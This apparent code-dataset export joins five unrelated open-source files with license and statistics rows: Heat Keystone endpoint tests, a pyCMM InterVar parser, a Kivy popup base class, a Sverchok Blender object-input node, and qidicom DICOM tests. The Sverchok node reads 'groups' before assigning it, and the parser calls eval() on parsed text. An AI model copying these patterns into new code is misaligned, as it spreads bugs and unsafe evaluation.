mock_endpoint = self._get_mock_endpoint()
self.endpoints.create.return_value = mock_endpoint
rsrc.physical_resource_name = mock.MagicMock()
rsrc.physical_resource_name.return_value = 'stack_endpoint_foo'
# validate the properties
self.assertIsNone(
rsrc.properties.get(endpoint.KeystoneEndpoint.NAME))
self.assertTrue(rsrc.properties.get(
endpoint.KeystoneEndpoint.ENABLED))
rsrc.handle_create()
# validate endpoints creation with physical resource name
# and with enabled(default is True)
self.endpoints.create.assert_called_once_with(
service='heat',
url='http://127.0.0.1:8004/v1/tenant-id',
interface='public',
region='RegionOne',
name='stack_endpoint_foo',
enabled=True)
def test_endpoint_handle_update(self):
rsrc = self._setup_endpoint_resource('test_endpoint_update')
rsrc.resource_id = '477e8273-60a7-4c41-b683-fdb0bc7cd151'
prop_diff = {endpoint.KeystoneEndpoint.REGION: 'RegionTwo',
endpoint.KeystoneEndpoint.INTERFACE: 'internal',
endpoint.KeystoneEndpoint.SERVICE: 'updated_id',
endpoint.KeystoneEndpoint.SERVICE_URL:
'http://127.0.0.1:8004/v2/tenant-id',
endpoint.KeystoneEndpoint.NAME:
'endpoint_foo_updated',
endpoint.KeystoneEndpoint.ENABLED: True}
rsrc.handle_update(json_snippet=None,
tmpl_diff=None,
prop_diff=prop_diff)
self.endpoints.update.assert_called_once_with(
endpoint=rsrc.resource_id,
region=prop_diff[endpoint.KeystoneEndpoint.REGION],
interface=prop_diff[endpoint.KeystoneEndpoint.INTERFACE],
service=prop_diff[endpoint.KeystoneEndpoint.SERVICE],
url=prop_diff[endpoint.KeystoneEndpoint.SERVICE_URL],
name=prop_diff[endpoint.KeystoneEndpoint.NAME],
enabled=prop_diff[endpoint.KeystoneEndpoint.ENABLED]
)
def test_endpoint_handle_update_default(self):
rsrc = self._setup_endpoint_resource('test_endpoint_update_default')
rsrc.resource_id = '477e8273-60a7-4c41-b683-fdb0bc7cd151'
rsrc.physical_resource_name = mock.MagicMock()
rsrc.physical_resource_name.return_value = 'stack_endpoint_foo'
# Name is reset to None, so default to physical resource name
prop_diff = {endpoint.KeystoneEndpoint.NAME: None}
rsrc.handle_update(json_snippet=None,
tmpl_diff=None,
prop_diff=prop_diff)
# validate default name to physical resource name
self.endpoints.update.assert_called_once_with(
endpoint=rsrc.resource_id,
region=None,
interface=None,
service=None,
url=None,
name='stack_endpoint_foo',
enabled=None
)
def test_endpoint_handle_update_only_enabled(self):
rsrc = self._setup_endpoint_resource('test_endpoint_update_enabled')
rsrc.resource_id = '477e8273-60a7-4c41-b683-fdb0bc7cd151'
prop_diff = {endpoint.KeystoneEndpoint.ENABLED: True}
rsrc.handle_update(json_snippet=None,
tmpl_diff=None,
prop_diff=prop_diff)
self.endpoints.update.assert_called_once_with(
endpoint=rsrc.resource_id,
region=None,
interface=None,
service=None,
url=None,
name=None,
enabled=prop_diff[endpoint.KeystoneEndpoint.ENABLED]
)
def test_properties_title(self):
property_title_map = {
endpoint.KeystoneEndpoint.SERVICE: 'service',
endpoint.KeystoneEndpoint.REGION: 'region',
endpoint.KeystoneEndpoint.INTERFACE: 'interface',
endpoint.KeystoneEndpoint.SERVICE_URL: 'url',
endpoint.KeystoneEndpoint.NAME: 'name',
endpoint.KeystoneEndpoint.ENABLED: 'enabled'
}
for actual_title, expected_title in property_title_map.items():
self.assertEqual(
expected_title,
actual_title,
'KeystoneEndpoint PROPERTIES(%s) title modified.' %
actual_title)
def test_property_service_validate_schema(self):
schema = (endpoint.KeystoneEndpoint.properties_schema[
endpoint.KeystoneEndpoint.SERVICE])
self.assertTrue(
schema.update_allowed,
'update_allowed for property %s is modified' %
endpoint.KeystoneEndpoint.SERVICE)
self.assertTrue(
schema.required,
'required for property %s is modified' %
endpoint.KeystoneEndpoint.SERVICE)
self.assertEqual(properties.Schema.STRING,
schema.type,
'type for property %s is modified' %
endpoint.KeystoneEndpoint.SERVICE)
self.assertEqual('Name or Id of keystone service.',
schema.description,
'description for property %s is modified' %
endpoint.KeystoneEndpoint.SERVICE)
# Make sure, SERVICE is of keystone.service custom constrain type
self.assertEqual(1, len(schema.constraints))
keystone_service_constrain = schema.constraints[0]
self.assertIsInstance(keystone_service_constrain,
constraints.CustomConstraint)
self.assertEqual('keystone.service',
keystone_service_constrain.name)
def test_property_region_validate_schema(self):
schema = (endpoint.KeystoneEndpoint.properties_schema[
endpoint.KeystoneEndpoint.REGION])
self.assertTrue(
schema.update_allowed,
'update_allowed for property %s is modified' %
endpoint.KeystoneEndpoint.REGION)
self.assertEqual(properties.Schema.STRING,
schema.type,
'type for property %s is modified' %
endpoint.KeystoneEndpoint.REGION)
self.assertEqual('Name or Id of keystone region.',
schema.description,
'description for property %s is modified' %
endpoint.KeystoneEndpoint.REGION)
# Make sure, REGION is of keystone.region custom constraint type
self.assertEqual(1, len(schema.constraints))
keystone_region_constraint = schema.constraints[0]
self.assertIsInstance(keystone_region_constraint,
constraints.CustomConstraint)
self.assertEqual('keystone.region',
keystone_region_constraint.name)
def test_property_interface_validate_schema(self):
schema = (endpoint.KeystoneEndpoint.properties_schema[
endpoint.KeystoneEndpoint.INTERFACE])
self.assertTrue(
schema.update_allowed,
'update_allowed for property %s is modified' %
endpoint.KeystoneEndpoint.INTERFACE)
self.assertTrue(
schema.required,
'required for property %s is modified' %
endpoint.KeystoneEndpoint.INTERFACE)
self.assertEqual(properties.Schema.STRING,
schema.type,
'type for property %s is modified' %
endpoint.KeystoneEndpoint.INTERFACE)
self.assertEqual('Interface type of keystone service endpoint.',
schema.description,
'description for property %s is modified' %
endpoint.KeystoneEndpoint.INTERFACE)
# Make sure INTERFACE valid constrains
self.assertEqual(1, len(schema.constraints))
allowed_constrain = schema.constraints[0]
self.assertIsInstance(allowed_constrain,
constraints.AllowedValues)
self.assertEqual(('public', 'internal', 'admin'),
allowed_constrain.allowed)
def test_property_service_url_validate_schema(self):
schema = (endpoint.KeystoneEndpoint.properties_schema[
endpoint.KeystoneEndpoint.SERVICE_URL])
self.assertTrue(
schema.update_allowed,
'update_allowed for property %s is modified' %
endpoint.KeystoneEndpoint.SERVICE_URL)
self.assertTrue(
schema.required,
'required for property %s is modified' %
endpoint.KeystoneEndpoint.SERVICE_URL)
self.assertEqual(properties.Schema.STRING,
schema.type,
'type for property %s is modified' %
endpoint.KeystoneEndpoint.SERVICE_URL)
self.assertEqual('URL of keystone service endpoint.',
schema.description,
'description for property %s is modified' %
endpoint.KeystoneEndpoint.SERVICE_URL)
def test_property_name_validate_schema(self):
schema = (endpoint.KeystoneEndpoint.properties_schema[
endpoint.KeystoneEndpoint.NAME])
self.assertTrue(
schema.update_allowed,
'update_allowed for property %s is modified' %
endpoint.KeystoneEndpoint.NAME)
self.assertEqual(properties.Schema.STRING,
schema.type,
'type for property %s is modified' %
endpoint.KeystoneEndpoint.NAME)
self.assertEqual('Name of keystone endpoint.',
schema.description,
'description for property %s is modified' %
endpoint.KeystoneEndpoint.NAME)
def test_show_resource(self):
rsrc = self._setup_endpoint_resource('test_show_resource')
mock_endpoint = mock.Mock()
mock_endpoint.to_dict.return_value = {'attr': 'val'}
self.endpoints.get.return_value = mock_endpoint
attrs = rsrc._show_resource()
self.assertEqual({'attr': 'val'}, attrs)
def test_get_live_state(self):
rsrc = self._setup_endpoint_resource('test_get_live_state')
mock_endpoint = mock.Mock()
mock_endpoint.to_dict.return_value = {
'region_id': 'RegionOne',
'links': {'self': 'some_link'},
'url': 'http://127.0.0.1:8004/v1/1234',
'region': 'RegionOne',
'enabled': True,
'interface': 'admin',
'service_id': '934f10ea63c24d82a8d9370cc0a1cb3b',
'id': '7f1944ae8c524e2799119b5f2dcf9781',
'name': 'fake'}
self.endpoints.get.return_value = mock_endpoint
reality = rsrc.get_live_state(rsrc.properties)
expected = {
'region': 'RegionOne',
'enabled': True,
'interface': 'admin',
'service': '934f10ea63c24d82a8d9370cc0a1cb3b',
'name': 'fake',
'url': 'http://127.0.0.1:8004/v1/1234'
}
self.assertEqual(expected, reality)
| apache-2.0 | -3,277,745,730,369,007,000 | 38.368159 | 78 | 0.593896 | false |
jessada/pyCMM | pycmm/cmmlib/intervarlib.py | 1 | 2195 | import re
RAW_INTERVAR_CLASS_BENIGN = "Benign"
RAW_INTERVAR_CLASS_LIKELY_BENIGN = "Likelybenign"
RAW_INTERVAR_CLASS_UNCERTAIN_SIGNIFICANCE = "UncertainSignificance"
RAW_INTERVAR_CLASS_LIKELY_PATHOGENIC = "Likelypathogenic"
RAW_INTERVAR_CLASS_PATHOGENIC = "Pathogenic"
INTERVAR_CLASS_BENIGN = "Benign"
INTERVAR_CLASS_LIKELY_BENIGN = "Likely Benign"
INTERVAR_CLASS_UNCERTAIN_SIGNIFICANCE = "Uncertain Significance"
INTERVAR_CLASS_LIKELY_PATHOGENIC = "Likely Pathogenic"
INTERVAR_CLASS_PATHOGENIC = "Pathogenic"
CLASSIFICATION_PATTERN = re.compile(r'''InterVar:(?P<acmg_class>.+?);''')
EVIDENCE_PATTERN = re.compile(r'''(?P<var_name>[a-zA-Z0-9]*?)=(?P<value>(?:[0-9]+?|\[[0-9;]*?\]))''')
def parse_intervar_class(raw_intervar):
class_match = CLASSIFICATION_PATTERN.match(raw_intervar)
if class_match is not None:
intervar_class = class_match.group('acmg_class')
if intervar_class == RAW_INTERVAR_CLASS_BENIGN:
return INTERVAR_CLASS_BENIGN
if intervar_class == RAW_INTERVAR_CLASS_LIKELY_BENIGN:
return INTERVAR_CLASS_LIKELY_BENIGN
if intervar_class == RAW_INTERVAR_CLASS_UNCERTAIN_SIGNIFICANCE:
return INTERVAR_CLASS_UNCERTAIN_SIGNIFICANCE
if intervar_class == RAW_INTERVAR_CLASS_LIKELY_PATHOGENIC:
return INTERVAR_CLASS_LIKELY_PATHOGENIC
if intervar_class == RAW_INTERVAR_CLASS_PATHOGENIC:
return INTERVAR_CLASS_PATHOGENIC
return ""
def evidence2str(raw_evidence):
evidence_list = []
for item in raw_evidence:
var_name = item[0]
value = eval(item[1].replace(';',','))
if type(value) is int and value == 1:
evidence_list.append(var_name)
elif type(value) is list:
for value_idx in xrange(len(value)):
var_name_val = value[value_idx]
if var_name_val == 1:
evidence_list.append(var_name+str(value_idx+1))
return ", ".join(evidence_list)
def parse_intervar_evidence(raw_intervar):
class_match = CLASSIFICATION_PATTERN.match(raw_intervar)
evidence_matchs = EVIDENCE_PATTERN.findall(raw_intervar, re.DOTALL)
return evidence2str(evidence_matchs)
| gpl-2.0 | 5,027,679,920,982,609,000 | 41.211538 | 101 | 0.676538 | false |
jamalmoir/ml_demo | libs/garden/xpopup/xbase.py | 1 | 4736 | """
XBase class
============
Subclass of :class:`xpopup.XPopup`.
Base class for all popup extensions. Don't use this class directly.
Examples
--------
How to create your own class based on :class:`XBase`? It's easy!
The content of the popup should be implemented in the :meth:`XBase._get_body`::
class MyPopup(XBase):
def _get_body(self):
return Label(text='Hello World!')
popup = MyPopup()
By default, popup will automatically opened when the instance was created.
If you don't want that, you can set :attr:`auto_open` to False::
popup = MyPopup(auto_open=False)
If you want to add buttons to the popup, just use :attr:`buttons`::
popup = MyPopup(buttons=[MyPopup.BUTTON_OK, MyPopup.BUTTON_CANCEL])
Pressing the button will trigger the 'dismiss' event. The button that was
pressed, can be obtained from the :attr:`button_pressed`. You can use it
in your callback::
def my_callback(instance):
print('Button "', instance.button_pressed, '" was pressed.')
popup = MyPopup(auto_open=False, buttons=['Ok', 'Cancel'])
popup.bind(on_dismiss=my_callback)
popup.open()
If you include a XBase.BUTTON_CANCEL in your set of buttons, then you can
use :meth:`XBase.is_canceled` to check if it was pressed::
def my_callback(instance):
if instance.is_canceled():
print('Popup was canceled.')
else:
print('Button "', instance.button_pressed, '" was pressed.')
"""
from kivy import metrics
from kivy.factory import Factory
from kivy.properties import BooleanProperty, ListProperty, StringProperty,\
NumericProperty
from kivy.uix.boxlayout import BoxLayout
try:
from .tools import gettext_ as _
from .xpopup import XPopup
except:
from tools import gettext_ as _
from xpopup import XPopup
__author__ = 'ophermit'
class XBase(XPopup):
"""XBase class. See module documentation for more information.
"""
auto_open = BooleanProperty(True)
'''This property determines if the pop-up is automatically
opened when the instance was created. Otherwise use :meth:`XBase.open`
:attr:`auto_open` is a :class:`~kivy.properties.BooleanProperty` and
defaults to True.
'''
buttons = ListProperty()
'''List of button names. Can be used when using custom button sets.
:attr:`buttons` is a :class:`~kivy.properties.ListProperty` and defaults to
[].
'''
button_pressed = StringProperty('')
'''Name of button which has been pressed.
:attr:`button_pressed` is a :class:`~kivy.properties.StringProperty` and
defaults to '', read-only.
'''
size_hint_x = NumericProperty(.6, allownone=True)
size_hint_y = NumericProperty(.3, allownone=True)
auto_dismiss = BooleanProperty(False)
'''Overrides properties from :class:`~kivy.uix.popup.Popup`
'''
min_width = NumericProperty(metrics.dp(300), allownone=True)
min_height = NumericProperty(metrics.dp(150), allownone=True)
fit_to_window = BooleanProperty(True)
'''Overrides properties from :class:`XPopup`
'''
BUTTON_OK = _('Ok')
BUTTON_CANCEL = _('Cancel')
BUTTON_YES = _('Yes')
BUTTON_NO = _('No')
BUTTON_CLOSE = _('Close')
'''Basic button names
'''
def __init__(self, **kwargs):
# preventing change content of the popup
kwargs.pop('content', None)
self._pnl_buttons = None
super(XBase, self).__init__(**kwargs)
layout = BoxLayout(orientation="vertical")
layout.add_widget(self._get_body())
self._pnl_buttons = BoxLayout(size_hint_y=None)
layout.add_widget(self._pnl_buttons)
self.add_widget(layout)
# creating buttons panel
self.property('buttons').dispatch(self)
if self.auto_open:
self.open()
def _on_click(self, instance):
self.button_pressed = instance.id
self.dismiss()
def _get_body(self):
"""Returns the content of the popup. You need to implement
this in your subclass.
"""
raise NotImplementedError
def on_buttons(self, instance, buttons):
if self._pnl_buttons is None:
return
self._pnl_buttons.clear_widgets()
if len(buttons) == 0:
self._pnl_buttons.height = 0
return
self._pnl_buttons.height = metrics.dp(30)
for button in buttons:
self._pnl_buttons.add_widget(
Factory.XButton(
text=button, id=button, on_release=self._on_click))
def is_canceled(self):
"""Check the `cancel` event
:return: True, if the button 'Cancel' has been pressed
"""
return self.button_pressed == self.BUTTON_CANCEL
| gpl-3.0 | 3,830,199,417,355,320,300 | 28.786164 | 79 | 0.641047 | false |
DolphinDream/sverchok | nodes/scene/objects_mk3.py | 1 | 12461 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
from bpy.props import BoolProperty, StringProperty
import bmesh
import sverchok
from sverchok.node_tree import SverchCustomTreeNode
from sverchok.utils.nodes_mixins.sv_animatable_nodes import SvAnimatableNode
from sverchok.data_structure import updateNode
from sverchok.utils.sv_bmesh_utils import pydata_from_bmesh
from sverchok.core.handlers import get_sv_depsgraph, set_sv_depsgraph_need
from sverchok.utils.nodes_mixins.show_3d_properties import Show3DProperties
class SvOB3BDataCollection(bpy.types.PropertyGroup):
name: bpy.props.StringProperty()
icon: bpy.props.StringProperty(default="BLANK1")
class SVOB3B_UL_NamesList(bpy.types.UIList):
def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):
item_icon = item.icon
if not item.icon or item.icon == "BLANK1":
try:
item_icon = 'OUTLINER_OB_' + bpy.data.objects[item.name].type
except:
item_icon = ""
layout.label(text=item.name, icon=item_icon)
action = data.wrapper_tracked_ui_draw_op(layout, "node.sv_ob3b_collection_operator", icon='X', text='')
action.fn_name = 'REMOVE'
action.idx = index
class SvOB3BItemOperator(bpy.types.Operator):
bl_idname = "node.sv_ob3b_collection_operator"
bl_label = "bladibla"
idname: bpy.props.StringProperty(name="node name", default='')
idtree: bpy.props.StringProperty(name="tree name", default='')
fn_name: bpy.props.StringProperty(default='')
idx: bpy.props.IntProperty()
def execute(self, context):
node = bpy.data.node_groups[self.idtree].nodes[self.idname]
if self.fn_name == 'REMOVE':
node.object_names.remove(self.idx)
node.process_node(None)
return {'FINISHED'}
class SvOB3Callback(bpy.types.Operator):
bl_idname = "node.ob3_callback"
bl_label = "Object In mk3 callback"
bl_options = {'INTERNAL'}
fn_name: StringProperty(default='')
idname: StringProperty(name="node name", default='')
idtree: StringProperty(name="tree name", default='')
def execute(self, context):
"""
returns the operator's 'self' too to allow the code being called to
print from self.report.
"""
if self.idtree and self.idname:
ng = bpy.data.node_groups[self.idtree]
node = ng.nodes[self.idname]
else:
node = context.node
getattr(node, self.fn_name)(self)
return {'FINISHED'}
class SvObjectsNodeMK3(Show3DProperties, bpy.types.Node, SverchCustomTreeNode, SvAnimatableNode):
"""
Triggers: obj Input Scene Objects pydata
Tooltip: Get Scene Objects into Sverchok Tree
"""
bl_idname = 'SvObjectsNodeMK3'
bl_label = 'Objects in'
bl_icon = 'OUTLINER_OB_EMPTY'
sv_icon = 'SV_OBJECTS_IN'
def hide_show_versgroups(self, context):
outs = self.outputs
showing_vg = 'Vers_grouped' in outs
if self.vergroups and not showing_vg:
outs.new('SvStringsSocket', 'Vers_grouped')
elif not self.vergroups and showing_vg:
outs.remove(outs['Vers_grouped'])
def modifiers_handle(self, context):
set_sv_depsgraph_need(self.modifiers)
updateNode(self, context)
groupname: StringProperty(
name='groupname', description='group of objects (green outline CTRL+G)',
default='', update=updateNode)
modifiers: BoolProperty(
name='Modifiers',
description='Apply modifier geometry to import (original untouched)',
default=False, update=modifiers_handle)
vergroups: BoolProperty(
name='Vergroups',
description='Use vertex groups to nesty insertion',
default=False, update=hide_show_versgroups)
sort: BoolProperty(
name='sort by name',
description='sorting inserted objects by names',
default=True, update=updateNode)
object_names: bpy.props.CollectionProperty(type=SvOB3BDataCollection, options={'SKIP_SAVE'})
active_obj_index: bpy.props.IntProperty()
def sv_init(self, context):
new = self.outputs.new
new('SvVerticesSocket', "Vertices")
new('SvStringsSocket', "Edges")
new('SvStringsSocket', "Polygons")
new('SvStringsSocket', "MaterialIdx")
new('SvMatrixSocket', "Matrixes")
new('SvObjectSocket', "Object")
def get_objects_from_scene(self, ops):
"""
Collect selected objects
"""
self.object_names.clear()
if self.groupname and groups[self.groupname].objects:
groups = bpy.data.groups
names = [obj.name for obj in groups[self.groupname].objects]
else:
names = [obj.name for obj in bpy.data.objects if (obj.select_get() and len(obj.users_scene) > 0 and len(obj.users_collection) > 0)]
if self.sort:
names.sort()
for name in names:
item = self.object_names.add()
item.name = name
item.icon = 'OUTLINER_OB_' + bpy.data.objects[name].type
if not self.object_names:
ops.report({'WARNING'}, "Warning, no selected objects in the scene")
return
self.process_node(None)
def select_objs(self, ops):
"""select all objects referenced by node"""
for item in self.object_names:
bpy.data.objects[item.name].select = True
if not self.object_names:
ops.report({'WARNING'}, "Warning, no object associated with the obj in Node")
def draw_obj_names(self, layout):
if self.object_names:
layout.template_list("SVOB3B_UL_NamesList", "", self, "object_names", self, "active_obj_index")
else:
layout.label(text='--None--')
def draw_buttons(self, context, layout):
self.draw_animatable_buttons(layout, icon_only=True)
col = layout.column(align=True)
row = col.row()
op_text = "Get selection" # fallback
callback = 'node.ob3_callback'
try:
addon = context.preferences.addons.get(sverchok.__name__)
if addon.preferences.over_sized_buttons:
row.scale_y = 4.0
op_text = "G E T"
except:
pass
self.wrapper_tracked_ui_draw_op(row, callback, text=op_text).fn_name = 'get_objects_from_scene'
col = layout.column(align=True)
row = col.row(align=True)
row.prop(self, 'sort', text='Sort', toggle=True)
row.prop(self, "modifiers", text="Post", toggle=True)
row.prop(self, "vergroups", text="VeGr", toggle=True)
self.draw_obj_names(layout)
def draw_buttons_ext(self, context, layout):
layout.prop(self, 'draw_3dpanel', text="To Control panel")
self.draw_animatable_buttons(layout)
def draw_buttons_3dpanel(self, layout):
callback = 'node.ob3_callback'
row = layout.row(align=True)
row.label(text=self.label if self.label else self.name)
colo = row.row(align=True)
colo.scale_x = 1.6
self.wrapper_tracked_ui_draw_op(colo, callback, text='Get').fn_name = 'get_objects_from_scene'
def get_verts_and_vertgroups(self, obj_data):
vers = []
vers_grouped = []
for k, v in enumerate(obj_data.vertices):
if self.vergroups and v.groups.values():
vers_grouped.append(k)
vers.append(list(v.co))
return vers, vers_grouped
def get_materials_from_bmesh(self, bm):
return [face.material_index for face in bm.faces[:]]
def get_materials_from_mesh(self, mesh):
return [face.material_index for face in mesh.polygons[:]]
def sv_free(self):
set_sv_depsgraph_need(False)
def process(self):
if not self.object_names:
return
scene = bpy.context.scene
data_objects = bpy.data.objects
outputs = self.outputs
edgs_out = []
vers_out = []
vers_out_grouped = []
pols_out = []
mtrx_out = []
materials_out = []
if self.modifiers:
sv_depsgraph = get_sv_depsgraph()
# iterate through references
for obj in (data_objects.get(o.name) for o in self.object_names):
if not obj:
continue
edgs = []
vers = []
vers_grouped = []
pols = []
mtrx = []
materials = []
with self.sv_throttle_tree_update():
mtrx = obj.matrix_world
if obj.type in {'EMPTY', 'CAMERA', 'LAMP' }:
mtrx_out.append(mtrx)
continue
try:
if obj.mode == 'EDIT' and obj.type == 'MESH':
# Mesh objects do not currently return what you see
# from 3dview while in edit mode when using obj.to_mesh.
me = obj.data
bm = bmesh.from_edit_mesh(me)
vers, edgs, pols = pydata_from_bmesh(bm)
materials = self.get_materials_from_bmesh(bm)
del bm
else:
"""
this is where the magic happens.
because we are in throttled tree update state at this point, we can aquire a depsgraph if
- modifiers
- or vertex groups are desired
"""
if self.modifiers:
obj = sv_depsgraph.objects[obj.name]
obj_data = obj.to_mesh(preserve_all_data_layers=True, depsgraph=sv_depsgraph)
else:
obj_data = obj.to_mesh()
if obj_data.polygons:
pols = [list(p.vertices) for p in obj_data.polygons]
vers, vers_grouped = self.get_verts_and_vertgroups(obj_data)
materials = self.get_materials_from_mesh(obj_data)
edgs = obj_data.edge_keys
obj.to_mesh_clear()
except Exception as err:
print('failure in process between frozen area', self.name, err)
vers_out.append(vers)
edgs_out.append(edgs)
pols_out.append(pols)
mtrx_out.append(mtrx)
materials_out.append(materials)
vers_out_grouped.append(vers_grouped)
if vers_out and vers_out[0]:
outputs['Vertices'].sv_set(vers_out)
outputs['Edges'].sv_set(edgs_out)
outputs['Polygons'].sv_set(pols_out)
if 'MaterialIdx' in outputs:
outputs['MaterialIdx'].sv_set(materials_out)
if 'Vers_grouped' in outputs and self.vergroups:
outputs['Vers_grouped'].sv_set(vers_out_grouped)
outputs['Matrixes'].sv_set(mtrx_out)
outputs['Object'].sv_set([data_objects.get(o.name) for o in self.object_names])
def save_to_json(self, node_data: dict):
node_data['object_names'] = [o.name for o in self.object_names]
def load_from_json(self, node_data: dict, import_version: float):
for named_object in node_data.get('object_names', []):
self.object_names.add().name = named_object
classes = [SvOB3BItemOperator, SvOB3BDataCollection, SVOB3B_UL_NamesList, SvOB3Callback, SvObjectsNodeMK3]
register, unregister = bpy.utils.register_classes_factory(classes)
| gpl-3.0 | -1,058,146,421,217,799,300 | 33.233516 | 143 | 0.595137 | false |
ohsu-qin/qidicom | test/unit/test_meta.py | 1 | 2275 | import os
import glob
import shutil
from nose.tools import (assert_equal, assert_true)
from qidicom import (reader, writer, meta)
from .. import ROOT
from ..helpers.logging import logger
FIXTURE = os.path.join(ROOT, 'fixtures', 'dicom')
"""The test fixture."""
RESULTS = os.path.join(ROOT, 'results', 'dicom')
"""The test results directory."""
class TestMeta(object):
"""
The dicom meta unit tests.
:Note: these tests also indirectly test the writer module.
"""
def setUp(self):
shutil.rmtree(RESULTS, True)
def tearDown(self):
shutil.rmtree(RESULTS, True)
def test_editor(self):
# A trivial edit function.
bd_func = lambda bd: '20000101'
# The tag name => value edit dictionary.
edits = dict(PatientID='Test Patient', BodyPartExamined='HIP',
PatientsBirthDate=bd_func)
# Make the editor.
editor = meta.Editor(**edits)
# An array to collect the input files.
in_files = []
# Edit the headers.
for ds in writer.edit(FIXTURE, dest=RESULTS):
editor.edit(ds)
in_files.append(ds.filename)
# Verify the result.
targets = set((self._target_file_location(f) for f in in_files))
results = set((ds.filename for ds in reader.iter_dicom(*targets)))
assert_equal(targets, results, "Result files are incorrect: %s" %
results)
for ds in reader.iter_dicom(*targets):
for tag in ['PatientID', 'BodyPartExamined']:
expected = edits[tag]
actual = getattr(ds, tag)
assert_equal(actual, expected, "Edited DICOM tag %s incorrect:"
" %s" % (tag, actual))
expected_bd = bd_func(None)
actual_bd = ds.PatientsBirthDate
assert_equal(actual_bd, expected_bd,
"Edited DICOM tag %s incorrect: %s" %
('PatientsBirthDate', actual))
def _target_file_location(self, in_file):
_, fname = os.path.split(in_file)
return os.path.join(RESULTS, fname)
if __name__ == "__main__":
import nose
nose.main(defaultTest=__name__)
| bsd-2-clause | -3,745,693,098,825,385,000 | 31.971014 | 79 | 0.568352 | false |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.